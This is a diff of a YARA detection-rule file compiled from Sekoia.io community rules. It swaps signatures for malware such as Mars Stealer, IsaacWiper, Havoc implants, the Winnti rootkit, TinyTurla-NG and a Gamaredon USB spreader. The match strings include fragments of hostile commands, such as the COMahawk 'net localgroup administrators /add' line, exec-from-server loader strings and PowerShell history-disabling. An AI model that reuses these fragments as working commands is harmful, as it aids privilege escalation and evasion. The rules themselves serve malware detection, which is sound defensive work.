-		$m = { 76 61 72 20 5f 30 78 [4-6] 3d 5b }
-		$w = {57 53 63 72 69 70 74 5b 5f 30 78 [4-6] 28 30 78 [2-3] 29 5d 28 30 78 [2-3] 2a 30 78 [2-3] 29 2c }
-		$t = "subkeys(key));}"
+		$ = "PYBOOTSTRAP"
+		$ = "http://google.com/generate_204"
+		$ = "from"
+		$ = "pathZ"
+		$ = "usernamez"
+		$ = "timeZ"
+		$ = "win32api"
+		$ = "base64Z"
+		$ = "json"
+		$ = "marshalZ"
+		$ = "BOOTSTRAP_VERSION"
+		$ = "getZ"
+		$ = "sleepZ    b64encode"
+		$ = "dumps"
+		$ = "executableZ"
+		$ = "GetUserNameExZ"
+		$ = "NameSamCompatible"
+		$ = "encode"
+		$ = "decodeZ"
+		$ = "request_dataZ"
+		$ = "server"
+		$ = "post"
+		$ = "raise_for_status"
+		$ = "exec"
+		$ = "loadsZ    b64decode"
+		$ = "text"
+		$ = "globals"
+		$ = "bootstrap.py"
+		$ = "<module>"
 
 	condition:
-		$m at 0 and ( $t at ( filesize -16 ) or $w in ( filesize -200 .. filesize ) )
+		uint32be( 0 ) == 0x420d0d0a and all of them
 }
-rule SEKOIA_Hacktool_Ntospy_Strings : FILE
+rule SEKOIA_Apt_Gamaredon_Gamaredon_Lnk_Usb_Spreader_Encoded : FILE
 {
 	meta:
-		description = "Detects Ntospy based on strings"
+		description = "Detects encoded version of Gamaredon LNK USB Spreader"
 		author = "Sekoia.io"
-		id = "c3281666-6a31-4718-a9c0-82944c6fdcb0"
-		date = "2023-12-05"
+		id = "e42bb654-d1aa-4219-b3da-dd4053d59a83"
+		date = "2023-06-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_ntospy_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_gamaredon_lnk_usb_spreader_encoded.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e5bd963419e515d65a03592051822fd801f4a21d54cdb18d408556c4bfef78f5"
+		hash = "28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01"
+		logic_hash = "81ab55330b3003cb698ade7e14eaea5fb03e5d2d3dd310b7db682aeef9b51f6e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237904,112 +237822,131 @@ rule SEKOIA_Hacktool_Ntospy_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "NPGetCaps"
-		$ = "NPLogonNotify"
-		$ = {43 00 3A 00 5C 00 [10-150] 00 2E 00 6D 00 73 00 75}
+		$s1 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(" ascii
+		$s2 = " 1000000){" base64
+		$s3 = "+\"\\$" base64
+		$s4 = ",3\";" base64
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 300KB and all of them
+		$s1 at 0 and 3 of them and filesize < 4000
 }
-rule SEKOIA_Luckymouse_Sysupdate_Loader : FILE
+
+rule SEKOIA_Infostealer_Win_Mars_Stealer : FILE
 {
 	meta:
-		description = "Detects decryption routine prologue of sysupdate loader"
+		description = "Detect Mars Stealer based on specific strings"
 		author = "Sekoia.io"
-		id = "6007e846-d467-4d07-b345-e25191b7c8bc"
-		date = "2022-08-19"
+		id = "3e2c7440b2fc9e4b039e6fa8152ac8fd"
+		date = "2022-02-03"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/luckymouse_sysupdate_loader.yar#L1-L17"
+		reference = "https://3xp0rt.com/posts/mars-stealer"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_mars_stealer.yar#L3-L44"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9d46b74d8e5f94ecd844cffcd6d0d29eb662374c1d6fbe87acf3c877e5f963b3"
+		logic_hash = "b2b36a280c3c6cbbb8cbb9f1dd3eb48a4943ebbddb48eba2ac3d0db03924cafd"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2022-02-14"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = { DB D4 33 C9 66 B9 ?? ?? E8 FF FF FF FF }
+		$dec = {a3 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? 00 00 83 c4 ??}
+		$api00 = "LoadLibrary" ascii
+		$api01 = "GetProcAddress" ascii
+		$api02 = "ExitProcess" ascii
+		$api03 = "advapi32.dll" ascii
+		$api04 = "crypt32.dll" ascii
+		$api05 = "GetTickCount" ascii
+		$api06 = "Sleep" ascii
+		$api07 = "GetUserDefaultLangID" ascii
+		$api08 = "CreateMutex" ascii
+		$api09 = "GetLastError" ascii
+		$api10 = "HeapAlloc" ascii
+		$api11 = "GetProcessHeap" ascii
+		$api12 = "GetComputerName" ascii
+		$api13 = "VirtualProtect" ascii
+		$api14 = "GetUserName" ascii
+		$api15 = "CryptStringToBinary" ascii
+		$str0 = "JohnDoe" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		uint16( 0 ) == 0x5A4D and ( #dec > 400 and 12 of ( $api* ) and $str0 ) or for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == "LLCPPC" and pe.sections [ i ] . raw_data_size < 5000 )
 }
-rule SEKOIA_Rat_Win_Borat : FILE
+
+rule SEKOIA_Wiper_Win_Isaacwiper
 {
 	meta:
-		description = "Detect the Borat RAT besed on specific strings"
+		description = "Detect the IsaacWiper using multiple methods + ReversingLab rule's condition"
 		author = "Sekoia.io"
-		id = "9f8badb3-ee8b-45d9-8515-c847351bb1f5"
-		date = "2022-04-08"
+		id = "b081e3a3-612e-46ae-93af-82e7ee98fcf7"
+		date = "2022-03-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_borat.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/wiper_win_isaacwiper.yar#L4-L45"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "53d6d9fe6b3218d97079e624379863d927d0b783b24acbda359b18daafb5162e"
+		logic_hash = "0338e11ece112b6f7d88db49cfc703a4431d7ee54f4b9ff0b9e2ea50d39cab4f"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "BoratRatMutex_Sa8XOfH1BudX" ascii
-		$str1 = "BoratRat.exe" ascii
-		$str2 = "BoratRat" ascii
-		$str3 = "CN=BoratRat" wide
-		$str4 = "Sending plugun to " wide
-		$str5 = "Save recorded file fail " wide
-		$str6 = "Sa8XOfH1BudX" wide
-		$str7 = "Alert when process activive." wide
-		$str8 = "disableDefedner" wide
-		$str9 = "bin\\Ransomware.dll" wide
-		$str10 = "disableDefedner" wide
+		$s1 = "getting drives..." wide
+		$s2 = "physical drives:" wide
+		$s3 = "-- system physical drive" wide
+		$s4 = "-- physical drive" wide
+		$s5 = "logical drives:" wide
+		$s6 = "-- system logical drive:" wide
+		$s7 = "-- logical drive:" wide
+		$s8 = "start erasing physical drives..." wide
+		$s9 = "-- FAILED" wide
+		$s10 = "-- start erasing logical drive" wide
+		$s11 = "start erasing system physical drive..." wide
+		$s12 = "system physical drive -- FAILED" wide
+		$s13 = "start erasing system logical drive" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 7 of them
+		pe.imphash( ) == "a4b162717c197e11b76a4d9bc58ea25d" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "06d63fddf89fae3948764028712c36d6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "48f101db632bb445c21a10fd5501e343" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5efc98798d0979e69e2a667fc20e3f24" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "9676f7c827fb9388358aaba3e4bd0cc6" ) or hash.md5 ( pe.rich_signature.clear_data ) == "ec862d3013903478c2ff8dce2792815f" or all of ( $s* )
 }
-rule SEKOIA_Backdoor_Lin_Sysupdate : FILE
+rule SEKOIA_Hafnium_Tarrask_Malware
 {
 	meta:
-		description = "Detect the SysUpdate malware"
+		description = "Hunting rule to look for Tarrask malware"
 		author = "Sekoia.io"
-		id = "9cb806cf-4ca1-44d8-809a-58cc5f364fb8"
-		date = "2023-03-01"
+		id = "6f1728d6-dc9b-4ea7-8656-2b069ee269a0"
+		date = "2022-04-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_lin_sysupdate.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hafnium_tarrask_malware.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "93e17cd535444e9cabc7440b1226526e67ddb81a84eb6377689a62f268b9dfee"
-		score = 75
-		quality = 80
-		tags = "FILE"
+		logic_hash = "f9309707d25cfe6bccf050f24e14c42b53f3d017916a02eaada74c4782efdd5c"
+		score = 50
+		quality = 76
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "generate guid path=%s"
-		$ = "3rd/asio/include/asio/detail/posix_event.hpp"
-		$ = "expires_at"
-		$ = "%s -f %s"
-		$ = "expires_after"
-		$ = "-run"
+		$s1 = "delete sd success" wide ascii nocase
+		$s2 = "Task successfully registered." wide ascii nocase
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		all of them
 }
-rule SEKOIA_Apt_Cloudmensis_Downloader_Strings : FILE
+rule SEKOIA_Implant_Win_Havoc_Default_Strings : FILE
 {
 	meta:
-		description = "Detects CloudMensis downloader"
+		description = "Finds Havoc implants based on the embedded default strings"
 		author = "Sekoia.io"
-		id = "450cfa42-7b56-4d93-afe2-9cf5c1049217"
-		date = "2022-07-26"
+		id = "955c2211-4502-4258-ba4c-0d96a5624283"
+		date = "2022-10-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudmensis_downloader_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_havoc_default_strings.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9532530f9b6c39d64611354f5d3c95e7c8b9ebf917ab797c162c3b51945db1fc"
+		logic_hash = "dbf17e579071f265961657d73c6a2e51630b23e80376491df2e631cee5ffb1b4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238017,26 +237954,31 @@ rule SEKOIA_Apt_Cloudmensis_Downloader_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "https://api.pcloud.com/getfilelink?path=%@&forcedownload=1"
-		$ = "python -c 'import os; print(os.confstr(65538))'"
-		$ = "getCmdResult:"
-		$ = "[pCloud DownloadFile:]"
+		$str01 = "C:\\Windows\\System32\\notepad.exe" ascii
+		$str02 = "C:\\Windows\\SysWOW64\\notepad.exe" ascii
+		$str03 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" ascii
+		$str04 = "POST" wide
+		$str05 = "\\??\\C:\\Windows\\System32\\ntdll.dll" wide
+		$str06 = "X-Havoc: true" ascii
+		$str07 = "X-Havoc-Agent: Demon" ascii
+		$str08 = "/text.gif" ascii
+		$str09 = "SeImpersonatePrivilege" ascii
 
 	condition:
-		uint32be( 0 ) == 0xcafebabe and filesize < 1MB and all of them
+		uint16( 0 ) == 0x5A4D and 6 of them
 }
-rule SEKOIA_Weevely_Webshell_Payload : FILE
+rule SEKOIA_Apt_Badmagic_Installpzz_Pshscript : FILE
 {
 	meta:
-		description = "Detects weevely webshell"
+		description = "Detects BadMagic InstallPZZ powershell script"
 		author = "Sekoia.io"
-		id = "f2879c6e-3d1b-41be-8b1d-4f0503fd4b29"
-		date = "2024-04-22"
+		id = "d01bc217-9e14-498b-a92a-17f6aedec269"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/weevely_webshell_payload.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_installpzz_pshscript.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "bb02ec519d77526cc81ebd7743336b333b9498f79079f7008970cf1bb51c4948"
+		logic_hash = "58256cffd1d5060769f304393c22b6488abe9515eb7df2a967ba2fed85a9ec9a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238044,53 +237986,55 @@ rule SEKOIA_Weevely_Webshell_Payload : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "<?php include \""
-		$s2 = ".basename(__FILE__).\""
-		$s3 = ";__HALT_COMPILER(); ?>"
+		$ = "start-job -ScriptBlock $script;"
+		$ = "Start-Sleep -Second 1;"
+		$ = "Write-Output \"$url$j"
+		$ = "Start-Sleep -Second 2;"
 
 	condition:
-		all of them and filesize < 1MB and @s1 == 0 and @s2 < @s3
+		all of them and filesize < 1KB
 }
-rule SEKOIA_Tool_Masky_Strings : FILE
+rule SEKOIA_Apt_Aptc36_Vbs_Maldoc : FILE
 {
 	meta:
-		description = "Detects Masky tool"
+		description = "Find VBS file used by the threat actor APT-C-36"
 		author = "Sekoia.io"
-		id = "542670ee-9f2e-4148-853d-a3f055bd584c"
-		date = "2022-08-23"
+		id = "f0ca061f-e94b-4f70-bbd1-8a15193652d3"
+		date = "2022-02-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_masky_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_aptc36_vbs_maldoc.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "35dc536879d9464919028ace6b65b225455621035184d7b58468d259ccda62aa"
+		logic_hash = "cf448731378e97d740d42aa19d1bb81330c3998f07e94ce57bd8d82fc39c6428"
 		score = 75
-		quality = 80
+		quality = 51
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "caa1aa2e-8a2a-4f98-bc51-b7cf10663fa9" ascii
-		$s2 = "Masky" ascii
-		$s3 = "\\Windows\\Temp\\" wide
-		$s4 = "Length must be non-negative" wide
-		$s5 = "CSP does not contain a private key" wide
+		$dim = "dim " wide ascii
+		$hea = "::::::::::::::::::::::::::::::::::::::::::::::::" wide ascii
+		$str0 = "update" wide ascii nocase
+		$str1 = "On Error Resume Next" wide ascii
+		$str2 = "CreateObject" wide ascii
+		$str3 = "WScript" wide ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them or $s1
+		#dim> 5 and #hea > 10 and 2 of ( $str* ) and filesize > 10KB and filesize < 1MB
 }
-rule SEKOIA_Apt_Boldmove_Strings : FILE
+rule SEKOIA_Tool_Exploit_Comahawk_Strings : FILE
 {
 	meta:
-		description = "Detects BOLDMOVE via strings"
+		description = "Detects COMahawk exploit compiled binaries"
 		author = "Sekoia.io"
-		id = "0458e282-f92f-4600-964a-de6b66b4a82d"
-		date = "2023-01-16"
+		id = "cc0d10ae-1a14-48c1-9c45-d65fac15f8f1"
+		date = "2022-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_boldmove_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_exploit_comahawk_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "71649451b88629da1779c0856b2f1f60f87501962c69556f7943b049688a2d96"
+		logic_hash = "a80fed3fd64562dd3e2fa197ca3d2aaf8e33783729b725c71f7eb8931af70d82"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238098,95 +238042,95 @@ rule SEKOIA_Apt_Boldmove_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "cwd=%s" ascii wide
-		$s2 = "executable=%s" ascii wide
-		$s3 = "curl/6.12.34" ascii wide
-		$s4 = "www.example.com" ascii wide
-		$s5 = "GET /ws HTTP/1.1" ascii wide
+		$ = "sc config UsoSvc binpath=" wide
+		$ = "binpath= \"cmd.exe /c net localgroup administrators /add"
+		$ = "[+] Command executed."
+		$ = "Release\\COMahawk.pdb"
+		$ = " is added as an admin."
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and 4 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
 }
-rule SEKOIA_Apt_Darkpink_Kamikakabot_Strings
+
+rule SEKOIA_Rootkit_Lin_Winnti : FILE
 {
 	meta:
-		description = "Detects KamiKakaBot strings (.NET sample of Dark Pink)"
+		description = "Rootkit used by Winnti"
 		author = "Sekoia.io"
-		id = "0f5a7d72-81c8-4fdd-aefd-136bc6d48aa5"
-		date = "2023-02-22"
+		id = "c800038e-7f8a-4f24-bf0b-06aba6a828cb"
+		date = "2024-05-22"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_darkpink_kamikakabot_strings.yar#L1-L30"
+		reference = "https://x.com/naumovax/status/1792902386295394629"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rootkit_lin_winnti.yar#L4-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0bc37c96b591d8edb1fd288ef874b3cc31879ce166b8734a3dd0e29644cbea55"
-		score = 75
+		logic_hash = "d57f9190d2d0c65dad6378d705328c0e9ef679eb8dad75af77d4bbc4f9d0f8d9"
+		score = 40
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "161344ae61278e09eacb1c76508cda45555eee109e6d6a031716a096ab5c84f3"
+		hash2 = "bb56e088739b281c9f56b4fa3fa4d285e45b32c4f9f06b647d7e8cb916054e1a"
+		hash3 = "777c1fda4008f122ff3aef9e80b5b5720c9f2dbc3d7e708277e2ccad1afd8cc5"
+		hash4 = "9c770b12a2da76c41f921f49a22d7bc6b5a1166875b9dc732bc7c05b6ae39241"
 
 	strings:
-		$ = "Execute"
-		$ = "f4869"
-		$ = "getIndentifyName"
-		$ = "getMessageAsync"
-		$ = "requestMessageID"
-		$ = "run_command"
-		$ = "sendFile"
-		$ = "sendMessage"
-		$ = "send_brw_data"
-		$ = "updateMessageID"
-		$ = "update_new_token"
-		$ = "update_new_xml"
-		$ = {53 00 74 00 61 00 72 00 74 00 65 00 64 00 20 00 75 00 70 00 20 00 72 00 75 00 6e}
-		$ = {20 00 72 00 65 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 00 21}
-		$ = {6e 00 65 00 77 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 00 21}
-		$ = {74 00 6f 00 6b 00 65 00 6e 00 20 00 75 00 70 00 64 00 61 00 74 00 65 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 21 00 21 00 21}
+		$ = "[CDATA[%s]]></name><type>%o</type><perm>%o</perm><user>%s:%s</user><size>%llu</size><time>%s</time></LIST>"
+		$ = "HideFile"
+		$ = "DownThread"
+		$ = "PortforwardThread"
+		$ = "HidePidPort"
+		$ = "DownFile"
+		$ = "ReadReConnConf"
+		$ = "DecRemotePort"
+		$ = "DecRemoteIP"
 
 	condition:
-		6 of them
+		uint32( 0 ) == 0x464c457f and 6 of them and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "7dea362b3fac8e00956a4952a3d4f474" )
 }
-rule SEKOIA_Stealer_Win_Mgbot_Credential_Stealer : FILE
+
+rule SEKOIA_Backoor_Win_Tinyturla_Ng : FILE
 {
 	meta:
-		description = "Detect MgBot credential stealer plugin"
+		description = "Detect the TinyTurla-NG backdoor used by Turla"
 		author = "Sekoia.io"
-		id = "e06501c1-c842-43f7-a429-9026bc0a4fd4"
-		date = "2024-03-20"
+		id = "019043bb-0212-4b73-bc93-03e9a746d28d"
+		date = "2024-03-04"
 		modified = "2024-12-19"
-		reference = "https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/stealer_win_mgbot_credential_stealer.yar#L1-L21"
+		reference = "https://blog.talosintelligence.com/tinyturla-next-generation/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backoor_win_tinyturla_ng.yar#L3-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "27f1b0ac818753804f0e67ac158d9376ab6beff8613ef94a1aa6cf8dd6815d49"
+		logic_hash = "a2fe2187e0cdd02fa31cbbecd600d044d4d12788ea6f76086aef7e77cbf232a0"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "174a62201c7e2af67b7ad37bf7935f064a379f169cf257ca16e912a46ecc9841"
-		hash2 = "cb7d9feda7d8ebfba93ec428d5a8a4382bf58e5a70e4b51eb1938d2691d5d4a5"
+		hash1 = "267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b"
+		hash2 = "d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40"
 
 	strings:
-		$ = "Software\\Aerofox\\Foxmail\\Indenties" wide
-		$ = "Software\\Aerofox\\FoxmailPreview" wide
-		$ = "IMAP Password" wide
-		$ = "POP3 Password" wide
+		$ = "delkill /F /IM explENT_USER\\Softwar"
+		$ = "Set-PSReadLineOption -HistorySaveStyle SaveNothing"
+		$ = "changeshell"
+		$ = "chcp 437 > $null"
+		$ = "powershell.exe -nologo"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16be( 0 ) == 0x4d5a and all of them or pe.imphash ( ) == "2240ae6f0dcbc0537836dfd9205a1f2b"
 }
-rule SEKOIA_Ransomware_Win_Karma : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_5 : FILE
 {
 	meta:
-		description = "Detect the Karma ransomware payload"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "efd87a17-7c99-404a-8ea6-2f5c2121f9f2"
-		date = "2021-08-25"
+		id = "cb4d266e-f2b7-4642-a223-57180e66a9a6"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_karma.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_5.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ef272be7ae5fea084120db95f7b002e9061d72442836e836ca43ddc7b461be4e"
+		logic_hash = "a68342b5bb2622deb71432da85cc249f35ca5b7b5dc70e069d6dcb6e9488e97e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238194,85 +238138,85 @@ rule SEKOIA_Ransomware_Win_Karma : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$a1 = "KARMA" ascii
-		$u1 = "KARMA" wide
-		$u2 = "-ENCRYPTED.txt" wide
-		$u3 = "Encrypting directory:" wide
-		$u4 = "Encrypting file:" wide
-		$u5 = "Trying to import ECC public key..." wide
+		$ = "rc4 = function(key, str)"
+		$ = "<job id=\"JS Code\""
+		$ = "var e={},i,b=0,c,x,l=0,a,r="
+		$ = "var plain = rc4("
+		$ = "eval(plain);"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 150KB and all of them
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Hacktool_Socat_Strings : FILE
+rule SEKOIA_Apt_Gamaredon_Gamaredon_Lnk_Usb_Spreader
 {
 	meta:
-		description = "Detects socat"
+		description = "Detects Gamaredon LNK USB Spreader"
 		author = "Sekoia.io"
-		id = "7c7e4085-39b2-445e-a9ff-52f21936e714"
-		date = "2023-12-08"
+		id = "a0972e30-bfc5-48ff-b04b-382db8c08a54"
+		date = "2023-06-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_socat_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_gamaredon_lnk_usb_spreader.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8f0c907fa2de4141c55073ea5b4a8174f50c716fc7a60d3e838115859a938084"
+		hash = "2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581"
+		logic_hash = "3adb2433eda559d9b32316f4733741b0fc8c576937b1decede8bc7d23b203a0e"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 64
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[options] <bi-address> <bi-address>"
-		$ = "version %s on %s"
-		$ = "socat_signal():"
+		$ = ".CREatesHoRTCUt(" nocase ascii wide
+		$ = "cOPY-Item $enV:UsErprOfilE" nocase ascii wide
+		$ = "-dEsTInaTioN $Env:" nocase ascii wide
+		$ = " = GET-ChilDITem $drivE.nAMe" nocase ascii wide
+		$ = "STArt-SLEeP" nocase ascii wide
+		$ = "-eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy" nocase ascii wide
+		$ = "drIvETYPe='2'" nocase ascii wide
+		$ = ".iConloCaTiON = " nocase ascii wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 5MB and all of them
+		7 of them
 }
-rule SEKOIA_Spyware_And_Fastfire : FILE
+
+rule SEKOIA_Backdoor_Win_Sidewinder_Cobaltstrike_2022_09
 {
 	meta:
-		description = "Detect the FastFire malware"
+		description = "Detect the SideWinder malware"
 		author = "Sekoia.io"
-		id = "93c0ffd5-faa5-4ead-8848-1c44b459dc29"
-		date = "2022-11-03"
+		id = "b5e8f87a-4a2c-49bb-aa98-bf3fb5056b23"
+		date = "2022-10-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/spyware_and_fastfire.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_sidewinder_cobaltstrike_2022_09.yar#L4-L29"
